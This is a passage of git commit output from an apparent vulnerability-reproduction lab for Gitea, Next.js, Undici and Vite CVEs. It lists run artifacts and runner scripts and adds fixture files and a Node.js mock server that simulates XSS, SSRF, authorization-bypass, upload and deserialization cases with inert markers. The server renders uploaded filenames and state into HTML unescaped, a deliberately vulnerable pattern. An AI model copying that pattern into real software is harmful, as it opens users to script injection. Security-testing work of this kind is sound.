 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/ready.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/seed.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.html
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.md
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/run.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/timeline.mmd
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/compose/compose.yaml
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-browser.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/docker/app.log
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/doctor.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-browser.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/ready.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/seed.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.html
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.md
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/run.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/timeline.mmd
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/compose/compose.yaml
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/docker/app.log
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/doctor.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/ready.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/seed.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.html
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.md
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/run.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/timeline.mmd
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/compose/compose.yaml
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-browser.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/docker/app.log
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/doctor.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-browser.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/ready.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/seed.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.html
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.md
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/run.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/timeline.mmd
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/compose/compose.yaml
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/baseline.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/docker/app.log
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/doctor.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/ready.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/seed.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.html
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.md
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/run.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/timeline.mmd
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/compose/compose.yaml
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/docker/app.log
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/doctor.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/ready.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/seed.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.html
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.md
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/run.json
 create mode 100644 06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/timeline.mmd
 delete mode 100644 08-threat-intel/registry/advisories/gitea--CVE-2018-15192.json
 delete mode 100644 08-threat-intel/registry/advisories/gitea--CVE-2018-18926.json
 delete mode 100644 08-threat-intel/registry/advisories/gitea--CVE-2019-1010261.json
 delete mode 100644 08-threat-intel/registry/advisories/gitea--CVE-2020-13246.json
 delete mode 100644 08-threat-intel/registry/advisories/gitea--CVE-2021-28378.json
 delete mode 100644 08-threat-intel/registry/advisories/gitea--CVE-2025-68939.json
 delete mode 100644 08-threat-intel/registry/advisories/gitea--CVE-2025-68940.json
 delete mode 100644 08-threat-intel/registry/advisories/nextjs--CVE-2020-15242.json
 delete mode 100644 08-threat-intel/registry/advisories/nextjs--CVE-2024-51479.json
 delete mode 100644 08-threat-intel/registry/advisories/nextjs--CVE-2025-29927.json
 delete mode 100644 08-threat-intel/registry/advisories/nextjs--CVE-2025-49826.json
 delete mode 100644 08-threat-intel/registry/advisories/nextjs--CVE-2025-55173.json
 delete mode 100644 08-threat-intel/registry/advisories/nextjs--CVE-2025-57752.json
 delete mode 100644 08-threat-intel/registry/advisories/nextjs--CVE-2025-57822.json
 delete mode 100644 08-threat-intel/registry/advisories/nextjs--CVE-2025-59471.json
 delete mode 100644 08-threat-intel/registry/advisories/nextjs--CVE-2025-59472.json
 delete mode 100644 08-threat-intel/registry/advisories/nextjs--GHSA-5j59-xgg2-r9c4.json
 delete mode 100644 08-threat-intel/registry/advisories/nextjs--GHSA-9qr9-h5gf-34mp.json
 delete mode 100644 08-threat-intel/registry/advisories/nextjs--GHSA-h25m-26qc-wcjf.json
 delete mode 100644 08-threat-intel/registry/advisories/nextjs--GHSA-mwv6-3258-q52c.json
 delete mode 100644 08-threat-intel/registry/advisories/nextjs--GHSA-w37m-7fhw-fmv9.json
 delete mode 100644 08-threat-intel/registry/advisories/undici--CVE-2022-31151.json
 delete mode 100644 08-threat-intel/registry/advisories/undici--CVE-2022-32210.json
 delete mode 100644 08-threat-intel/registry/advisories/undici--CVE-2023-45143.json
 delete mode 100644 08-threat-intel/registry/advisories/undici--CVE-2024-30260.json
 delete mode 100644 08-threat-intel/registry/advisories/undici--CVE-2024-30261.json
 delete mode 100644 08-threat-intel/registry/advisories/undici--CVE-2025-22150.json
 delete mode 100644 08-threat-intel/registry/advisories/undici--CVE-2025-47279.json
 delete mode 100644 08-threat-intel/registry/advisories/undici--CVE-2026-1525.json
 delete mode 100644 08-threat-intel/registry/advisories/undici--CVE-2026-1526.json
 delete mode 100644 08-threat-intel/registry/advisories/undici--CVE-2026-1527.json
 delete mode 100644 08-threat-intel/registry/advisories/undici--CVE-2026-1528.json
 delete mode 100644 08-threat-intel/registry/advisories/undici--CVE-2026-22036.json
 delete mode 100644 08-threat-intel/registry/advisories/undici--CVE-2026-2229.json
 delete mode 100644 08-threat-intel/registry/advisories/undici--CVE-2026-2581.json
 delete mode 100644 08-threat-intel/registry/advisories/vite--CVE-2024-23331.json
 delete mode 100644 08-threat-intel/registry/advisories/vite--CVE-2024-45811.json
 delete mode 100644 08-threat-intel/registry/advisories/vite--CVE-2024-45812.json
 delete mode 100644 08-threat-intel/registry/advisories/vite--CVE-2025-24010.json
 delete mode 100644 08-threat-intel/registry/advisories/vite--CVE-2025-30208.json
 delete mode 100644 08-threat-intel/registry/advisories/vite--CVE-2025-31125.json
 delete mode 100644 08-threat-intel/registry/advisories/vite--CVE-2025-31486.json
 delete mode 100644 08-threat-intel/registry/advisories/vite--CVE-2025-32395.json
 delete mode 100644 08-threat-intel/registry/advisories/vite--CVE-2025-46565.json
 delete mode 100644 08-threat-intel/registry/advisories/vite--CVE-2025-58751.json
 delete mode 100644 08-threat-intel/registry/advisories/vite--CVE-2025-58752.json
 delete mode 100644 08-threat-intel/registry/advisories/vite--CVE-2025-62522.json
 create mode 100644 08-threat-intel/registry/runs/gitea-gitea--CVE-2018-15192-20260318012749.json
 create mode 100644 08-threat-intel/registry/runs/gitea-gitea--CVE-2018-18926-20260318012526.json
 create mode 100644 08-threat-intel/registry/runs/gitea-gitea--CVE-2019-1010261-20260318012624.json
 create mode 100644 08-threat-intel/registry/runs/gitea-gitea--CVE-2020-13246-20260318012806.json
 create mode 100644 08-threat-intel/registry/runs/gitea-gitea--CVE-2021-28378-20260318012813.json
 create mode 100644 08-threat-intel/registry/runs/gitea-gitea--CVE-2025-68940-20260318012708.json
 create mode 100644 08-threat-intel/registry/runs/nextjs-nextjs--CVE-2020-15242-20260318012830.json
 create mode 100644 08-threat-intel/registry/runs/nextjs-nextjs--CVE-2024-34351-20260318012953.json
 create mode 100644 08-threat-intel/registry/runs/nextjs-nextjs--CVE-2024-51479-20260318012913.json
 delete mode 100644 08-threat-intel/registry/systems/adminer.json
 delete mode 100644 08-threat-intel/registry/systems/adobe-commerce.json
 delete mode 100644 08-threat-intel/registry/systems/angular.json
 delete mode 100644 08-threat-intel/registry/systems/apache-httpd.json
 delete mode 100644 08-threat-intel/registry/systems/apache-tomcat.json
 delete mode 100644 08-threat-intel/registry/systems/aspnet-core.json
 delete mode 100644 08-threat-intel/registry/systems/astro.json
 delete mode 100644 08-threat-intel/registry/systems/caddy.json
 delete mode 100644 08-threat-intel/registry/systems/directus.json
 delete mode 100644 08-threat-intel/registry/systems/discourse.json
 delete mode 100644 08-threat-intel/registry/systems/django.json
 delete mode 100644 08-threat-intel/registry/systems/drupal.json
 delete mode 100644 08-threat-intel/registry/systems/echo.json
 delete mode 100644 08-threat-intel/registry/systems/esbuild.json
 delete mode 100644 08-threat-intel/registry/systems/express.json
 delete mode 100644 08-threat-intel/registry/systems/fastify.json
 delete mode 100644 08-threat-intel/registry/systems/flask.json
 delete mode 100644 08-threat-intel/registry/systems/ghost.json
 delete mode 100644 08-threat-intel/registry/systems/gin.json
 delete mode 100644 08-threat-intel/registry/systems/gitea.json
 delete mode 100644 08-threat-intel/registry/systems/gitlab-ce.json
 delete mode 100644 08-threat-intel/registry/systems/grafana.json
 delete mode 100644 08-threat-intel/registry/systems/hapi.json
 delete mode 100644 08-threat-intel/registry/systems/haproxy.json
 delete mode 100644 08-threat-intel/registry/systems/jenkins.json
 delete mode 100644 08-threat-intel/registry/systems/joomla.json
 delete mode 100644 08-threat-intel/registry/systems/kibana.json
 delete mode 100644 08-threat-intel/registry/systems/koa.json
 delete mode 100644 08-threat-intel/registry/systems/laravel.json
 delete mode 100644 08-threat-intel/registry/systems/magento-open-source.json
 delete mode 100644 08-threat-intel/registry/systems/mattermost.json
 delete mode 100644 08-threat-intel/registry/systems/mediawiki.json
 delete mode 100644 08-threat-intel/registry/systems/medusa.json
 delete mode 100644 08-threat-intel/registry/systems/moodle.json
 delete mode 100644 08-threat-intel/registry/systems/nestjs.json
 delete mode 100644 08-threat-intel/registry/systems/nextjs.json
 delete mode 100644 08-threat-intel/registry/systems/nginx.json
 delete mode 100644 08-threat-intel/registry/systems/nodejs.json
 delete mode 100644 08-threat-intel/registry/systems/nuxt.json
 delete mode 100644 08-threat-intel/registry/systems/opencart.json
 delete mode 100644 08-threat-intel/registry/systems/openmage.json
 delete mode 100644 08-threat-intel/registry/systems/phpmyadmin.json
 delete mode 100644 08-threat-intel/registry/systems/prestashop.json
 delete mode 100644 08-threat-intel/registry/systems/rails.json
 delete mode 100644 08-threat-intel/registry/systems/react.json
 delete mode 100644 08-threat-intel/registry/systems/redmine.json
 delete mode 100644 08-threat-intel/registry/systems/saleor.json
 delete mode 100644 08-threat-intel/registry/systems/shopware.json
 delete mode 100644 08-threat-intel/registry/systems/spring-boot.json
 delete mode 100644 08-threat-intel/registry/systems/spring-framework.json
 delete mode 100644 08-threat-intel/registry/systems/spring-security.json
 delete mode 100644 08-threat-intel/registry/systems/strapi.json
 delete mode 100644 08-threat-intel/registry/systems/sveltekit.json
 delete mode 100644 08-threat-intel/registry/systems/symfony.json
 delete mode 100644 08-threat-intel/registry/systems/traefik.json
 delete mode 100644 08-threat-intel/registry/systems/undici.json
 delete mode 100644 08-threat-intel/registry/systems/vite.json
 delete mode 100644 08-threat-intel/registry/systems/vue.json
 delete mode 100644 08-threat-intel/registry/systems/webpack.json
 delete mode 100644 08-threat-intel/registry/systems/werkzeug.json
 delete mode 100644 08-threat-intel/registry/systems/woocommerce.json
 delete mode 100644 08-threat-intel/registry/systems/wordpress.json
 create mode 100644 08-threat-intel/repro-profiles/system-family/gitea-authz-bypass.yaml
 create mode 100644 08-threat-intel/repro-profiles/system-family/gitea-file-upload.yaml
 create mode 100644 08-threat-intel/repro-profiles/system-family/gitea-proxy-boundary.yaml
 create mode 100644 08-threat-intel/repro-profiles/system-family/gitea-ssrf.yaml
 create mode 100644 08-threat-intel/repro-profiles/system-family/gitea-xss.yaml
 create mode 100644 08-threat-intel/repro-profiles/system-family/nextjs-authz-bypass.yaml
 create mode 100644 08-threat-intel/repro-profiles/system-family/nextjs-deserialization.yaml
 create mode 100644 08-threat-intel/repro-profiles/system-family/nextjs-proxy-boundary.yaml
 create mode 100644 08-threat-intel/repro-profiles/system-family/nextjs-ssrf.yaml
 create mode 100644 08-threat-intel/repro-profiles/system-family/nextjs-xss.yaml
 create mode 100644 08-threat-intel/repro-profiles/system-family/undici-ssrf.yaml
 create mode 100644 08-threat-intel/repro-profiles/system-family/vite-file-upload.yaml
 create mode 100644 08-threat-intel/repro-profiles/system-family/vite-proxy-boundary.yaml
 create mode 100644 08-threat-intel/repro-profiles/system-family/vite-xss.yaml
 create mode 100644 scripts/lab/doctor.py
 create mode 100644 scripts/lab/evaluate.py
 create mode 100644 scripts/lab/runners/__init__.py
 create mode 100644 scripts/lab/runners/common.py
 create mode 100644 scripts/lab/runners/dispatcher.py
 create mode 100644 scripts/lab/runners/gitea/__init__.py
 create mode 100644 scripts/lab/runners/gitea/authz_bypass.py
 create mode 100644 scripts/lab/runners/gitea/file_upload.py
 create mode 100644 scripts/lab/runners/gitea/proxy_boundary.py
 create mode 100644 scripts/lab/runners/gitea/ssrf.py
 create mode 100644 scripts/lab/runners/gitea/xss.py
 create mode 100644 scripts/lab/runners/nextjs/__init__.py
 create mode 100644 scripts/lab/runners/nextjs/authz_bypass.py
 create mode 100644 scripts/lab/runners/nextjs/deserialization.py
 create mode 100644 scripts/lab/runners/nextjs/proxy_boundary.py
 create mode 100644 scripts/lab/runners/nextjs/ssrf.py
 create mode 100644 scripts/lab/runners/nextjs/xss.py
 create mode 100644 scripts/lab/runners/undici/__init__.py
 create mode 100644 scripts/lab/runners/undici/ssrf.py
 create mode 100644 scripts/lab/runners/vite/__init__.py
 create mode 100644 scripts/lab/runners/vite/file_upload.py
 create mode 100644 scripts/lab/runners/vite/proxy_boundary.py
 create mode 100644 scripts/lab/runners/vite/xss.py

diff --git a/00-environments/templates/fixtures/gitea/authz-bypass/scenario.json b/00-environments/templates/fixtures/gitea/authz-bypass/scenario.json
new file mode 100644
index 00000000..cd23e90a
--- /dev/null
+++ b/00-environments/templates/fixtures/gitea/authz-bypass/scenario.json
@@ -0,0 +1,2 @@
+{"system_id":"gitea","family":"authz-bypass","title":"Gitea Authz Bypass Fixture","subtitle":"Protected admin route with server-side bypass marker.","browser_required":false}
+
diff --git a/00-environments/templates/fixtures/gitea/file-upload/scenario.json b/00-environments/templates/fixtures/gitea/file-upload/scenario.json
new file mode 100644
index 00000000..484ae214
--- /dev/null
+++ b/00-environments/templates/fixtures/gitea/file-upload/scenario.json
@@ -0,0 +1,2 @@
+{"system_id":"gitea","family":"file-upload","title":"Gitea File Upload Fixture","subtitle":"Attachment acceptance path with inert upload marker.","browser_required":true}
+
diff --git a/00-environments/templates/fixtures/gitea/proxy-boundary/scenario.json b/00-environments/templates/fixtures/gitea/proxy-boundary/scenario.json
new file mode 100644
index 00000000..b3c33655
--- /dev/null
+++ b/00-environments/templates/fixtures/gitea/proxy-boundary/scenario.json
@@ -0,0 +1,2 @@
+{"system_id":"gitea","family":"proxy-boundary","title":"Gitea Proxy Boundary Fixture","subtitle":"Forwarded header trust boundary and admin gate fixture.","browser_required":true}
+
diff --git a/00-environments/templates/fixtures/gitea/ssrf/scenario.json b/00-environments/templates/fixtures/gitea/ssrf/scenario.json
new file mode 100644
index 00000000..d97f474f
--- /dev/null
+++ b/00-environments/templates/fixtures/gitea/ssrf/scenario.json
@@ -0,0 +1,2 @@
+{"system_id":"gitea","family":"ssrf","title":"Gitea SSRF Fixture","subtitle":"Server-side callback route restricted to a local sink.","browser_required":false}
+
diff --git a/00-environments/templates/fixtures/gitea/xss/scenario.json b/00-environments/templates/fixtures/gitea/xss/scenario.json
new file mode 100644
index 00000000..494481ed
--- /dev/null
+++ b/00-environments/templates/fixtures/gitea/xss/scenario.json
@@ -0,0 +1,2 @@
+{"system_id":"gitea","family":"xss","title":"Gitea Stored XSS Fixture","subtitle":"Stored payload rendering path for browser proof capture.","browser_required":true}
+
diff --git a/00-environments/templates/fixtures/nextjs/authz-bypass/scenario.json b/00-environments/templates/fixtures/nextjs/authz-bypass/scenario.json
new file mode 100644
index 00000000..6cf7c204
--- /dev/null
+++ b/00-environments/templates/fixtures/nextjs/authz-bypass/scenario.json
@@ -0,0 +1,2 @@
+{"system_id":"nextjs","family":"authz-bypass","title":"Next.js Authz Bypass Fixture","subtitle":"Protected route fixture with explicit bypass proof.","browser_required":false}
+
diff --git a/00-environments/templates/fixtures/nextjs/deserialization/scenario.json b/00-environments/templates/fixtures/nextjs/deserialization/scenario.json
new file mode 100644
index 00000000..8327e9f6
--- /dev/null
+++ b/00-environments/templates/fixtures/nextjs/deserialization/scenario.json
@@ -0,0 +1,2 @@
+{"system_id":"nextjs","family":"deserialization","title":"Next.js Deserialization Fixture","subtitle":"Unsafe decode path with inert marker object.","browser_required":false}
+
diff --git a/00-environments/templates/fixtures/nextjs/proxy-boundary/scenario.json b/00-environments/templates/fixtures/nextjs/proxy-boundary/scenario.json
new file mode 100644
index 00000000..4989e78a
--- /dev/null
+++ b/00-environments/templates/fixtures/nextjs/proxy-boundary/scenario.json
@@ -0,0 +1,2 @@
+{"system_id":"nextjs","family":"proxy-boundary","title":"Next.js Proxy Boundary Fixture","subtitle":"Middleware trust-boundary fixture with forwarded-header proof.","browser_required":true}
+
diff --git a/00-environments/templates/fixtures/nextjs/ssrf/scenario.json b/00-environments/templates/fixtures/nextjs/ssrf/scenario.json
new file mode 100644
index 00000000..e67d94c4
--- /dev/null
+++ b/00-environments/templates/fixtures/nextjs/ssrf/scenario.json
@@ -0,0 +1,2 @@
+{"system_id":"nextjs","family":"ssrf","title":"Next.js SSRF Fixture","subtitle":"Server-side fetch route restricted to local sink validation.","browser_required":false}
+
diff --git a/00-environments/templates/fixtures/nextjs/xss/scenario.json b/00-environments/templates/fixtures/nextjs/xss/scenario.json
new file mode 100644
index 00000000..39bd011d
--- /dev/null
+++ b/00-environments/templates/fixtures/nextjs/xss/scenario.json
@@ -0,0 +1,2 @@
+{"system_id":"nextjs","family":"xss","title":"Next.js XSS Fixture","subtitle":"Browser proof page for stored payload rendering.","browser_required":true}
+
diff --git a/00-environments/templates/fixtures/shared/node_fixture.mjs b/00-environments/templates/fixtures/shared/node_fixture.mjs
new file mode 100644
index 00000000..6c664345
--- /dev/null
+++ b/00-environments/templates/fixtures/shared/node_fixture.mjs
@@ -0,0 +1,171 @@
+import fs from "node:fs";
+import http from "node:http";
+
+const scenario = JSON.parse(fs.readFileSync(process.env.LAB_FIXTURE_SCENARIO, "utf8"));
+const port = Number(process.env.PORT || 3000);
+const state = {
+  seeded: false,
+  proof: false,
+  family: scenario.family,
+  system_id: scenario.system_id,
+  case_id: "",
+  detail: "fixture ready",
+  uploads: [],
+  sink_hits: 0,
+  payload: null,
+  events: []
+};
+
+function note(event, detail) {
+  state.events.push({ event, detail });
+  state.events = state.events.slice(-20);
+}
+
+function sendJson(res, statusCode, payload) {
+  const body = JSON.stringify(payload);
+  res.writeHead(statusCode, { "content-type": "application/json", "content-length": Buffer.byteLength(body) });
+  res.end(body);
+}
+
+function renderHtml() {
+  const proof = state.proof;
+  const banner = proof ? `<div class="proof">Proof active: ${state.detail}</div>` : `<div class="baseline">Baseline ready</div>`;
+  const xssBlock = proof && state.family === "xss"
+    ? `<script>document.documentElement.setAttribute("data-xss-proof","true");document.title=${JSON.stringify(`${scenario.title} - proof`)};</script><div id="xss-proof">XSS marker executed for ${state.case_id}</div>`
+    : "";
+  const uploads = state.uploads.length ? `<section><h2>Uploads</h2><ul>${state.uploads.map((item) => `<li>${item.filename}</li>`).join("")}</ul></section>` : "";
+  const sink = state.sink_hits ? `<section id="ssrf-proof">Local sink hits: ${state.sink_hits}</section>` : "";
+  const admin = proof && ["proxy-boundary", "authz-bypass"].includes(state.family)
+    ? `<section id="admin-proof">Admin boundary bypass confirmed.</section>`
+    : "";
+  const deserialize = proof && state.family === "deserialization"
+    ? `<section id="deserialize-proof">Decoded marker: ${state.case_id}</section>`
+    : "";
+  return `<!doctype html>
+<html lang="zh-CN">
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>${scenario.title}${proof && state.family !== "xss" ? " - proof" : ""}</title>
+  <style>
+    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }
+    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: 16px; padding: 24px; }
+    .proof { padding: 14px; border-radius: 12px; background: #14532d; color: #dcfce7; }
+    .baseline { padding: 14px; border-radius: 12px; background: #1e3a8a; color: #dbeafe; }
+    code { background: rgba(255,255,255,0.08); padding: 2px 6px; border-radius: 6px; }
+  </style>
+</head>
+<body>
+  <main>
+    <h1>${scenario.title}</h1>
+    <p>${scenario.subtitle}</p>
+    ${banner}
+    <p>System: <code>${scenario.system_id}</code> / Family: <code>${scenario.family}</code></p>
+    ${admin}
+    ${xssBlock}
+    ${uploads}
+    ${sink}
+    ${deserialize}
+  </main>
+</body>
+</html>`;
+}
+
+function readBody(req) {
+  return new Promise((resolve) => {
+    const chunks = [];
+    req.on("data", (chunk) => chunks.push(chunk));
+    req.on("end", () => {
+      try {
+        resolve(JSON.parse(Buffer.concat(chunks).toString("utf8") || "{}"));
+      } catch (_error) {
+        resolve({});
+      }
+    });
+  });
+}
+
+async function handleAttack(payload) {
+  const family = payload.family || state.family;
+  state.case_id = payload.case_id || state.case_id;
+  state.payload = payload;
+  state.proof = true;
+  if (family === "proxy-boundary") {
+    state.detail = "trusted forwarded headers crossed the boundary";
+  } else if (family === "authz-bypass") {
+    state.detail = "server-side authorization recheck was bypassed";
+  } else if (family === "ssrf") {
+    await fetch(`http://127.0.0.1:${port}/sink?case_id=${encodeURIComponent(state.case_id)}`);
+    state.detail = "server-side callback reached the local sink";
+  } else if (family === "xss") {
+    state.detail = "stored payload rendered inside the browser proof page";
+  } else if (family === "file-upload") {
+    state.uploads.push({ filename: payload.filename || `${state.case_id}.txt`, content: payload.content || "" });
+    state.detail = "upload marker accepted and listed";
+  } else if (family === "deserialization") {
+    state.detail = "unsafe object graph decoded without gadget execution";
+  }
+  note("attack", state.detail);
+}
+
+const server = http.createServer(async (req, res) => {
+  const url = new URL(req.url, `http://127.0.0.1:${port}`);
+  if (req.method === "GET" && url.pathname === "/healthz") {
+    sendJson(res, 200, { ok: true, system_id: scenario.system_id, family: scenario.family });
+    return;
+  }
+  if (req.method === "GET" && url.pathname === "/") {
+    const body = renderHtml();
+    res.writeHead(200, { "content-type": "text/html; charset=utf-8", "content-length": Buffer.byteLength(body) });
+    res.end(body);
+    return;
+  }
+  if (req.method === "GET" && url.pathname === "/admin") {
+    if (state.proof && ["proxy-boundary", "authz-bypass"].includes(state.family)) {
+      sendJson(res, 200, { ok: true, detail: state.detail, case_id: state.case_id });
+    } else {
+      sendJson(res, 403, { ok: false, detail: "admin boundary still enforced" });
+    }
+    return;
+  }
+  if (req.method === "GET" && url.pathname === "/sink") {
+    state.sink_hits += 1;
+    note("sink-hit", url.searchParams.toString() || "local callback");
+    sendJson(res, 200, { ok: true, sink_hits: state.sink_hits });
+    return;
+  }
+  if (req.method === "GET" && url.pathname === "/proof") {
+    sendJson(res, 200, {
+      success: Boolean(state.proof),
+      detail: state.detail,
+      case_id: state.case_id,
+      sink_hits: state.sink_hits,
+      uploads: state.uploads,
+      events: state.events
+    });
+    return;
+  }
+  if (req.method === "POST" && url.pathname === "/seed") {
+    const payload = await readBody(req);
+    state.seeded = true;
